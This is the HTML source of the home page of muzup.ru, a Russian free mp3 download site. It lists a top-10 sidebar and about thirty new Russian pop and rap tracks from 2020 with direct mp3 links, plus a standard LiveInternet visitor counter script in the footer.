<!DOCTYPE html>
<html lang="ru">
<head>
<meta charset="utf-8">
<title>Muzup.ru - Скачать музыку бесплатно в mp3 2019</title>
<meta name="description" content="Просто бомбовые песни и ничего больше. Вы хотите быть в тренде в области музыки? Тогда мы ждем вас каждый день!">
<meta name="keywords" content="крутые треки, новинки танцпола, свежие песни">
<meta name="google-site-verification" content="15tCR6Z8GiSe8qOabrLFPiTNDmX0LhsCSJeHpue8zrU" />
<meta name="yandex-verification" content="495542270c858cd7" />
<link rel="canonical" href="https://muzup.ru/">
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<link rel="shortcut icon" href="/templates/up/images/favicon.png" />
<link href="/templates/up/style/styles.css" type="text/css" rel="stylesheet" />
<link href="/templates/up/style/engine.css" type="text/css" rel="stylesheet" />
<meta name="theme-color" content="#4F5ABC">
</head>
<body>

<div class="wrap">

	<div class="wrap-center wrap-main">
	
		<header class="header fx-row fx-middle">
			<a href="https://muzup.ru/" class="logo"><img src="/templates/up/images/logo.png" alt="" /></a>
			<div class="search-wrap fx-1">
				<form id="quicksearch" method="post">
					<input type="hidden" name="do" value="search" />
					<input type="hidden" name="subaction" value="search" />
					<div class="search-box">
						<input id="story" name="story" placeholder="Поиск песни или исполнителя" type="text" />
						<button type="submit"><span class="fa fa-search"></span></button>
					</div>
				</form>
			</div>
		</header>
		
		<!-- END HEADER -->
		
		<div class="content">
		
			<div class="cols fx-row">
            
				<aside class="col-left">
                	<div class="sect side-box">
						<div class="sect-header fx-row">
							<div class="sect-header-left fx-1">
								<div class="sect-title">Навигация</div>
							</div>
						</div>
						<div class="sect-content side-box-content-menu side-box-nav">
							<ul>
								<li><a href="/" class="is-active">Новые релизы</a></li>
								<li><a href="/russkie-pesni/">Русские песни</a></li>
								<li><a href="/zarubezhnye-pesni/">Зарубежная музыка</a></li>
								<li><a href="#">Топовые треки</a></li>
							</ul>
						</div>
					</div>
					<div class="sect side-box">
						<div class="sect-header fx-row">
							<div class="sect-header-left fx-1">
								<div class="sect-title">Топ-10</div>
							</div>
						</div>
                        <div class="sect-content">
							<div class="track-item-side fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2018/10/Rauf_Faik_Detstvo.mp3" data-title="Детство" data-artist="Rauf & Faik" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img-side img-box img-fit"></div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/rauf-faik-detstvo.html"><div class="track-title nowrap anim">Детство</div><div class="singer">Rauf & Faik</div></a>
</div><div class="track-item-side fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2019/03/RaiM_Dvigatsya.mp3" data-title="Двигаться" data-artist="Райм" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img-side img-box img-fit"></div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/raym-dvigatsya.html"><div class="track-title nowrap anim">Двигаться</div><div class="singer">Райм</div></a>
</div><div class="track-item-side fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2018/12/LIRANOV_Gyurza.mp3" data-title="Гюрза" data-artist="LIRANOV" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img-side img-box img-fit"></div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/liranov-gyurza.html"><div class="track-title nowrap anim">Гюрза</div><div class="singer">LIRANOV</div></a>
</div><div class="track-item-side fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2018/09/Liza_Evans_Sladkaya_vata.mp3" data-title="Сладкая вата" data-artist="Liza Evans" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img-side img-box img-fit"></div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/liza-evans-sladkaya-vata.html"><div class="track-title nowrap anim">Сладкая вата</div><div class="singer">Liza Evans</div></a>
</div><div class="track-item-side fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2018/10/Rauf_Faik_Vechera.mp3" data-title="Вечера" data-artist="Rauf & Faik" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img-side img-box img-fit"></div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/rauf-faik-vechera.html"><div class="track-title nowrap anim">Вечера</div><div class="singer">Rauf & Faik</div></a>
</div><div class="track-item-side fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2018/12/LIZER_Korabli.mp3" data-title="Корабли" data-artist="LIZER" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img-side img-box img-fit"></div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/lizer-korabli.html"><div class="track-title nowrap anim">Корабли</div><div class="singer">LIZER</div></a>
</div><div class="track-item-side fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2019/11/The_Limba_Ty_mnogo_plakala_v_chyom_tut_moya_vina.mp3" data-title="Ты много плакала в чём тут моя вина" data-artist="The Limba" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img-side img-box img-fit"></div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/the-limba-ty-mnogo-plakala-v-chyom-tut-moya-vina.html"><div class="track-title nowrap anim">Ты много плакала в чём тут моя вина</div><div class="singer">The Limba</div></a>
</div><div class="track-item-side fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2019/11/Artem_Kacher_Odinokaya_luna.mp3" data-title="Одинокая луна" data-artist="Артем Качер" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img-side img-box img-fit"></div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/artem-kacher-odinokaya-luna.html"><div class="track-title nowrap anim">Одинокая луна</div><div class="singer">Артем Качер</div></a>
</div><div class="track-item-side fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2019/02/Artik_Asti_Grustnyj_dens_feat_Artem_Kacher.mp3" data-title="Грустный дэнс (feat. Артем Качер)" data-artist="Artik & Asti" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img-side img-box img-fit"></div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/artik-asti-grustnyj-dens-feat-artem-kacher.html"><div class="track-title nowrap anim">Грустный дэнс (feat. Артем Качер)</div><div class="singer">Artik & Asti</div></a>
</div><div class="track-item-side fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2018/09/Mekhman_Rastopi.mp3" data-title="Растопи" data-artist="Mekhman" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img-side img-box img-fit"></div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/mekhman-rastopi.html"><div class="track-title nowrap anim">Растопи</div><div class="singer">Mekhman</div></a>
</div>
						</div>                            
					</div>
				</aside>
				
				<!-- END COL-LEFT -->
			
				<main class="col-right fx-1">
					
					
					<div class="sect">
						<div class="sect-header fx-row">
							<div class="sect-header-left fx-1">
								<div class="sect-title">Сегодняшние новинки</div>
							</div>
							<a href="#" class="sect-link icon-right">Показать все<span class="fa fa-angle-right"></span></a>
						</div>
						<div class="sect-content sect-incat">
							<div class="track-item fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2020/07/sqwoz-bab-ya-potrogal-budto-doktor-mp3.mp3" data-title="Я потрогал будто доктор" data-artist="SQWOZ BAB" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img img-box img-fit">
		<img src="/templates/up/dleimages/no_image.svg" alt="SQWOZ BAB - Я потрогал будто доктор" title="SQWOZ BAB - Я потрогал будто доктор">
		<div class="track-play js-ctrl js-play anim" title="SQWOZ BAB - Я потрогал будто доктор"><span class="fa fa-play"></span></div>
	</div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/sqwoz-bab-ya-potrogal-budto-doktor.html"><div class="track-title nowrap anim">SQWOZ BAB - <span class="song">Я потрогал будто доктор</span></div></a>
	
	<div class="track-time anim">2:19</div>
</div><div class="track-item fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2020/07/pika-zavodnoj-apelsin-mp3.mp3" data-title="Заводной апельсин" data-artist="Пика" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img img-box img-fit">
		<img src="/templates/up/dleimages/no_image.svg" alt="Пика - Заводной апельсин" title="Пика - Заводной апельсин">
		<div class="track-play js-ctrl js-play anim" title="Пика - Заводной апельсин"><span class="fa fa-play"></span></div>
	</div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/pika-zavodnoj-apelsin.html"><div class="track-title nowrap anim">Пика - <span class="song">Заводной апельсин</span></div></a>
	
	<div class="track-time anim">0:51</div>
</div><div class="track-item fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2020/07/rajonnyj-uletaj-mp3.mp3" data-title="Улетай" data-artist="Районный" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img img-box img-fit">
		<img src="/templates/up/dleimages/no_image.svg" alt="Районный - Улетай" title="Районный - Улетай">
		<div class="track-play js-ctrl js-play anim" title="Районный - Улетай"><span class="fa fa-play"></span></div>
	</div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/rajonnyj-uletaj.html"><div class="track-title nowrap anim">Районный - <span class="song">Улетай</span></div></a>
	
	<div class="track-time anim">3:00</div>
</div><div class="track-item fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2020/07/navai-ellai-milaya-moya-mp3.mp3" data-title="Милая моя" data-artist="Navai, Эллаи" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img img-box img-fit">
		<img src="/templates/up/dleimages/no_image.svg" alt="Navai, Эллаи - Милая моя" title="Navai, Эллаи - Милая моя">
		<div class="track-play js-ctrl js-play anim" title="Navai, Эллаи - Милая моя"><span class="fa fa-play"></span></div>
	</div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/navai-ellai-milaya-moya.html"><div class="track-title nowrap anim">Navai, Эллаи - <span class="song">Милая моя</span></div></a>
	
	<div class="track-time anim">2:02</div>
</div><div class="track-item fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2020/07/tima-belorusskih-marshrutki-mp3.mp3" data-title="Маршрутки" data-artist="Тима Белорусских" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img img-box img-fit">
		<img src="/templates/up/dleimages/no_image.svg" alt="Тима Белорусских - Маршрутки" title="Тима Белорусских - Маршрутки">
		<div class="track-play js-ctrl js-play anim" title="Тима Белорусских - Маршрутки"><span class="fa fa-play"></span></div>
	</div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/tima-belorusskih-marshrutki.html"><div class="track-title nowrap anim">Тима Белорусских - <span class="song">Маршрутки</span></div></a>
	
	<div class="track-time anim">0:56</div>
</div><div class="track-item fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2020/07/guf-smoki-mo-bang-bang-mp3.mp3" data-title="Bang Bang" data-artist="Guf, Смоки Мо" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img img-box img-fit">
		<img src="/templates/up/dleimages/no_image.svg" alt="Guf, Смоки Мо - Bang Bang" title="Guf, Смоки Мо - Bang Bang">
		<div class="track-play js-ctrl js-play anim" title="Guf, Смоки Мо - Bang Bang"><span class="fa fa-play"></span></div>
	</div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/guf-smoki-mo-bang-bang.html"><div class="track-title nowrap anim">Guf, Смоки Мо - <span class="song">Bang Bang</span></div></a>
	
	<div class="track-time anim">0:31</div>
</div><div class="track-item fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2020/07/kavabanga-depo-kolibri-devochka-mechta-mp3.mp3" data-title="Девочка-мечта" data-artist="Kavabanga Depo Kolibri" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img img-box img-fit">
		<img src="/templates/up/dleimages/no_image.svg" alt="Kavabanga Depo Kolibri - Девочка-мечта" title="Kavabanga Depo Kolibri - Девочка-мечта">
		<div class="track-play js-ctrl js-play anim" title="Kavabanga Depo Kolibri - Девочка-мечта"><span class="fa fa-play"></span></div>
	</div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/kavabanga-depo-kolibri-devochka-mechta.html"><div class="track-title nowrap anim">Kavabanga Depo Kolibri - <span class="song">Девочка-мечта</span></div></a>
	
	<div class="track-time anim">1:00</div>
</div><div class="track-item fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2020/07/asiya-nu-che-ty-takoj-horoshij-mp3.mp3" data-title="Ну че ты такой хороший?" data-artist="Асия" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img img-box img-fit">
		<img src="/templates/up/dleimages/no_image.svg" alt="Асия - Ну че ты такой хороший?" title="Асия - Ну че ты такой хороший?">
		<div class="track-play js-ctrl js-play anim" title="Асия - Ну че ты такой хороший?"><span class="fa fa-play"></span></div>
	</div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/asiya-nu-che-ty-takoj-horoshij.html"><div class="track-title nowrap anim">Асия - <span class="song">Ну че ты такой хороший?</span></div></a>
	
	<div class="track-time anim">0:20</div>
</div><div class="track-item fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2020/07/svirid-midiblack-sam-sebya-ubil-mp3.mp3" data-title="Сам Себя Убил" data-artist="Свирид, MIDIBlack" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img img-box img-fit">
		<img src="/templates/up/dleimages/no_image.svg" alt="Свирид, MIDIBlack - Сам Себя Убил" title="Свирид, MIDIBlack - Сам Себя Убил">
		<div class="track-play js-ctrl js-play anim" title="Свирид, MIDIBlack - Сам Себя Убил"><span class="fa fa-play"></span></div>
	</div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/svirid-midiblack-sam-sebya-ubil.html"><div class="track-title nowrap anim">Свирид, MIDIBlack - <span class="song">Сам Себя Убил</span></div></a>
	
	<div class="track-time anim">3:24</div>
</div><div class="track-item fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2020/07/taras-cvetok-sredi-moego-hlama-mp3.mp3" data-title="Цветок среди моего хлама" data-artist="TARAS" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img img-box img-fit">
		<img src="/templates/up/dleimages/no_image.svg" alt="TARAS - Цветок среди моего хлама" title="TARAS - Цветок среди моего хлама">
		<div class="track-play js-ctrl js-play anim" title="TARAS - Цветок среди моего хлама"><span class="fa fa-play"></span></div>
	</div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/taras-cvetok-sredi-moego-hlama.html"><div class="track-title nowrap anim">TARAS - <span class="song">Цветок среди моего хлама</span></div></a>
	
	<div class="track-time anim">3:09</div>
</div><div class="track-item fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2020/07/ars-n-vidim-naskvoz-mp3.mp3" data-title="Видим насквозь" data-artist="ARS-N" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img img-box img-fit">
		<img src="/templates/up/dleimages/no_image.svg" alt="ARS-N - Видим насквозь" title="ARS-N - Видим насквозь">
		<div class="track-play js-ctrl js-play anim" title="ARS-N - Видим насквозь"><span class="fa fa-play"></span></div>
	</div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/ars-n-vidim-naskvoz.html"><div class="track-title nowrap anim">ARS-N - <span class="song">Видим насквозь</span></div></a>
	
	<div class="track-time anim">2:23</div>
</div><div class="track-item fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2020/07/mozgi-chica-bamboni-mp3.mp3" data-title="Chica Bamboni" data-artist="MOZGI" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img img-box img-fit">
		<img src="/templates/up/dleimages/no_image.svg" alt="MOZGI - Chica Bamboni" title="MOZGI - Chica Bamboni">
		<div class="track-play js-ctrl js-play anim" title="MOZGI - Chica Bamboni"><span class="fa fa-play"></span></div>
	</div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/mozgi-chica-bamboni.html"><div class="track-title nowrap anim">MOZGI - <span class="song">Chica Bamboni</span></div></a>
	
	<div class="track-time anim">2:33</div>
</div><div class="track-item fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2020/07/hilme-gambit-13-schaste-poteryala-mp3.mp3" data-title="Счастье потеряла" data-artist="HILME, Gambit 13" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img img-box img-fit">
		<img src="/templates/up/dleimages/no_image.svg" alt="HILME, Gambit 13 - Счастье потеряла" title="HILME, Gambit 13 - Счастье потеряла">
		<div class="track-play js-ctrl js-play anim" title="HILME, Gambit 13 - Счастье потеряла"><span class="fa fa-play"></span></div>
	</div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/hilme-gambit-13-schaste-poteryala.html"><div class="track-title nowrap anim">HILME, Gambit 13 - <span class="song">Счастье потеряла</span></div></a>
	
	<div class="track-time anim">3:42</div>
</div><div class="track-item fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2020/07/archeenews-cali-hollywood-mp3.mp3" data-title="Hollywood" data-artist="archeenews, Cali" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img img-box img-fit">
		<img src="/templates/up/dleimages/no_image.svg" alt="archeenews, Cali - Hollywood" title="archeenews, Cali - Hollywood">
		<div class="track-play js-ctrl js-play anim" title="archeenews, Cali - Hollywood"><span class="fa fa-play"></span></div>
	</div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/archeenews-cali-hollywood.html"><div class="track-title nowrap anim">archeenews, Cali - <span class="song">Hollywood</span></div></a>
	
	<div class="track-time anim">2:56</div>
</div><div class="track-item fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2020/07/pyrokinesis-molot-vedm-mp3.mp3" data-title="Молот ведьм" data-artist="pyrokinesis" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img img-box img-fit">
		<img src="/templates/up/dleimages/no_image.svg" alt="pyrokinesis - Молот ведьм" title="pyrokinesis - Молот ведьм">
		<div class="track-play js-ctrl js-play anim" title="pyrokinesis - Молот ведьм"><span class="fa fa-play"></span></div>
	</div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/pyrokinesis-molot-vedm.html"><div class="track-title nowrap anim">pyrokinesis - <span class="song">Молот ведьм</span></div></a>
	
	<div class="track-time anim">2:34</div>
</div><div class="track-item fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2020/07/tvojvozduh-okean-mp3.mp3" data-title="Океан" data-artist="твойвоздух" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img img-box img-fit">
		<img src="/templates/up/dleimages/no_image.svg" alt="твойвоздух - Океан" title="твойвоздух - Океан">
		<div class="track-play js-ctrl js-play anim" title="твойвоздух - Океан"><span class="fa fa-play"></span></div>
	</div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/tvojvozduh-okean.html"><div class="track-title nowrap anim">твойвоздух - <span class="song">Океан</span></div></a>
	
	<div class="track-time anim">3:02</div>
</div><div class="track-item fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2020/07/ruslan-chernyj-papa-lyubit-mp3.mp3" data-title="Папа любит" data-artist="Руслан Черный" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img img-box img-fit">
		<img src="/templates/up/dleimages/no_image.svg" alt="Руслан Черный - Папа любит" title="Руслан Черный - Папа любит">
		<div class="track-play js-ctrl js-play anim" title="Руслан Черный - Папа любит"><span class="fa fa-play"></span></div>
	</div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/ruslan-chernyj-papa-lyubit.html"><div class="track-title nowrap anim">Руслан Черный - <span class="song">Папа любит</span></div></a>
	
	<div class="track-time anim">3:24</div>
</div><div class="track-item fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2020/07/t1one-pokruzhim-mp3.mp3" data-title="Покружим" data-artist="T1One" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img img-box img-fit">
		<img src="/templates/up/dleimages/no_image.svg" alt="T1One - Покружим" title="T1One - Покружим">
		<div class="track-play js-ctrl js-play anim" title="T1One - Покружим"><span class="fa fa-play"></span></div>
	</div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/t1one-pokruzhim.html"><div class="track-title nowrap anim">T1One - <span class="song">Покружим</span></div></a>
	
	<div class="track-time anim">3:25</div>
</div><div class="track-item fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2020/07/monatik-ya-sochinyayu-leto-mp3.mp3" data-title="Я сочиняю лето" data-artist="MONATIK" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img img-box img-fit">
		<img src="/templates/up/dleimages/no_image.svg" alt="MONATIK - Я сочиняю лето" title="MONATIK - Я сочиняю лето">
		<div class="track-play js-ctrl js-play anim" title="MONATIK - Я сочиняю лето"><span class="fa fa-play"></span></div>
	</div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/monatik-ya-sochinyayu-leto.html"><div class="track-title nowrap anim">MONATIK - <span class="song">Я сочиняю лето</span></div></a>
	
	<div class="track-time anim">1:22</div>
</div><div class="track-item fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2020/07/fobiani-krichat-mp3.mp3" data-title="Кричать" data-artist="Fobiani" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img img-box img-fit">
		<img src="/templates/up/dleimages/no_image.svg" alt="Fobiani - Кричать" title="Fobiani - Кричать">
		<div class="track-play js-ctrl js-play anim" title="Fobiani - Кричать"><span class="fa fa-play"></span></div>
	</div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/fobiani-krichat.html"><div class="track-title nowrap anim">Fobiani - <span class="song">Кричать</span></div></a>
	
	<div class="track-time anim">2:52</div>
</div><div class="track-item fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2020/07/oksana-dzhelieva-lyubi-menya-mp3.mp3" data-title="Люби Меня" data-artist="Оксана Джелиева" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img img-box img-fit">
		<img src="/templates/up/dleimages/no_image.svg" alt="Оксана Джелиева - Люби Меня" title="Оксана Джелиева - Люби Меня">
		<div class="track-play js-ctrl js-play anim" title="Оксана Джелиева - Люби Меня"><span class="fa fa-play"></span></div>
	</div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/oksana-dzhelieva-lyubi-menya.html"><div class="track-title nowrap anim">Оксана Джелиева - <span class="song">Люби Меня</span></div></a>
	
	<div class="track-time anim">2:58</div>
</div><div class="track-item fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2020/07/dior-samo-id-polozhenie-safiter-remix-mp3.mp3" data-title="Положение (Safiter Remix)" data-artist="DIOR, Samo, ID" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img img-box img-fit">
		<img src="/templates/up/dleimages/no_image.svg" alt="DIOR, Samo, ID - Положение (Safiter Remix)" title="DIOR, Samo, ID - Положение (Safiter Remix)">
		<div class="track-play js-ctrl js-play anim" title="DIOR, Samo, ID - Положение (Safiter Remix)"><span class="fa fa-play"></span></div>
	</div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/dior-samo-id-polozhenie-safiter-remix.html"><div class="track-title nowrap anim">DIOR, Samo, ID - <span class="song">Положение (Safiter Remix)</span></div></a>
	
	<div class="track-time anim">2:50</div>
</div><div class="track-item fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2020/07/eleem-v-plenu-mp3.mp3" data-title="В Плену" data-artist="Eleem" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img img-box img-fit">
		<img src="/templates/up/dleimages/no_image.svg" alt="Eleem - В Плену" title="Eleem - В Плену">
		<div class="track-play js-ctrl js-play anim" title="Eleem - В Плену"><span class="fa fa-play"></span></div>
	</div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/eleem-v-plenu.html"><div class="track-title nowrap anim">Eleem - <span class="song">В Плену</span></div></a>
	
	<div class="track-time anim">1:47</div>
</div><div class="track-item fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2020/07/captown-levan-goroziya-l-one-gosti-mp3.mp3" data-title="Гости" data-artist="Captown, Леван Горозия (L'One)" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img img-box img-fit">
		<img src="/templates/up/dleimages/no_image.svg" alt="Captown, Леван Горозия (L&#039;One) - Гости" title="Captown, Леван Горозия (L&#039;One) - Гости">
		<div class="track-play js-ctrl js-play anim" title="Captown, Леван Горозия (L&#039;One) - Гости"><span class="fa fa-play"></span></div>
	</div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/captown-levan-goroziya-l-one-gosti.html"><div class="track-title nowrap anim">Captown, Леван Горозия (L'One) - <span class="song">Гости</span></div></a>
	
	<div class="track-time anim">3:39</div>
</div><div class="track-item fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2020/07/grechanik-ne-bogat-mp3.mp3" data-title="Не Богат" data-artist="Grechanik" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img img-box img-fit">
		<img src="/templates/up/dleimages/no_image.svg" alt="Grechanik - Не Богат" title="Grechanik - Не Богат">
		<div class="track-play js-ctrl js-play anim" title="Grechanik - Не Богат"><span class="fa fa-play"></span></div>
	</div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/grechanik-ne-bogat.html"><div class="track-title nowrap anim">Grechanik - <span class="song">Не Богат</span></div></a>
	
	<div class="track-time anim">2:58</div>
</div><div class="track-item fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2020/07/mitchel-a-uzhe-vse-mp3.mp3" data-title="А уже все" data-artist="MITCHEL" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img img-box img-fit">
		<img src="/templates/up/dleimages/no_image.svg" alt="MITCHEL - А уже все" title="MITCHEL - А уже все">
		<div class="track-play js-ctrl js-play anim" title="MITCHEL - А уже все"><span class="fa fa-play"></span></div>
	</div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/mitchel-a-uzhe-vse.html"><div class="track-title nowrap anim">MITCHEL - <span class="song">А уже все</span></div></a>
	
	<div class="track-time anim">02:14</div>
</div><div class="track-item fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2020/07/dana-sokolova-kambulat-nlo-mp3.mp3" data-title="НЛО" data-artist="Дана Соколова, Kambulat" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img img-box img-fit">
		<img src="/templates/up/dleimages/no_image.svg" alt="Дана Соколова, Kambulat - НЛО" title="Дана Соколова, Kambulat - НЛО">
		<div class="track-play js-ctrl js-play anim" title="Дана Соколова, Kambulat - НЛО"><span class="fa fa-play"></span></div>
	</div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/dana-sokolova-kambulat-nlo.html"><div class="track-title nowrap anim">Дана Соколова, Kambulat - <span class="song">НЛО</span></div></a>
	
	<div class="track-time anim">3:45</div>
</div><div class="track-item fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2020/07/mseven-tonu-mp3.mp3" data-title="Тону" data-artist="MSeven" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img img-box img-fit">
		<img src="/templates/up/dleimages/no_image.svg" alt="MSeven - Тону" title="MSeven - Тону">
		<div class="track-play js-ctrl js-play anim" title="MSeven - Тону"><span class="fa fa-play"></span></div>
	</div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/mseven-tonu.html"><div class="track-title nowrap anim">MSeven - <span class="song">Тону</span></div></a>
	
	<div class="track-time anim">3:05</div>
</div><div class="track-item fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2020/07/shadrin-daj-mne-mp3.mp3" data-title="Дай Мне" data-artist="Шадрин" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img img-box img-fit">
		<img src="/templates/up/dleimages/no_image.svg" alt="Шадрин - Дай Мне" title="Шадрин - Дай Мне">
		<div class="track-play js-ctrl js-play anim" title="Шадрин - Дай Мне"><span class="fa fa-play"></span></div>
	</div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/shadrin-daj-mne.html"><div class="track-title nowrap anim">Шадрин - <span class="song">Дай Мне</span></div></a>
	
	<div class="track-time anim">3:38</div>
</div><div class="track-item fx-row fx-middle anim js-item" data-track="https://muzup.ru/uploads/music/2020/07/jasiko-daj-mne-vremya-mp3.mp3" data-title="Дай Мне Время" data-artist="Jasiko" data-img="/templates/up/dleimages/no_image.svg">
	<div class="track-img img-box img-fit">
		<img src="/templates/up/dleimages/no_image.svg" alt="Jasiko - Дай Мне Время" title="Jasiko - Дай Мне Время">
		<div class="track-play js-ctrl js-play anim" title="Jasiko - Дай Мне Время"><span class="fa fa-play"></span></div>
	</div>
	<a class="track-desc fx-1 anim" href="https://muzup.ru/jasiko-daj-mne-vremya.html"><div class="track-title nowrap anim">Jasiko - <span class="song">Дай Мне Время</span></div></a>
	
	<div class="track-time anim">2:42</div>
</div>
						</div>
					</div>
					
				</main>
				
				<!-- END COL-MAIN -->
				
			</div>
			
			<!-- END COLS -->
			
		</div>
		
		<!-- END CONTENT -->
		
	</div>
	
	<!-- END WRAP-MAIN -->

</div>

<footer class="footer">
Музап.ру - Новинки песни в mp3 2020
<br/>
Жалобы, вопросы и добавление трека: <b><a href="mailto:admin@muzup.ru">admin@muzup.ru</a></b>
<div class="hidden">
<!--LiveInternet counter--><script type="text/javascript">
document.write("<a href='//www.liveinternet.ru/click' "+
"target=_blank><img src='//counter.yadro.ru/hit?t25.6;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";h"+escape(document.title.substring(0,150))+";"+Math.random()+
"' alt='' title='LiveInternet: показано число посетителей за"+
" сегодня' "+
"border='0' width='88' height='15'><\/a>")
</script><!--/LiveInternet-->
</div>
</footer>
<!-- END WRAP -->

<script src="/engine/classes/js/jquery.js?v=24"></script>
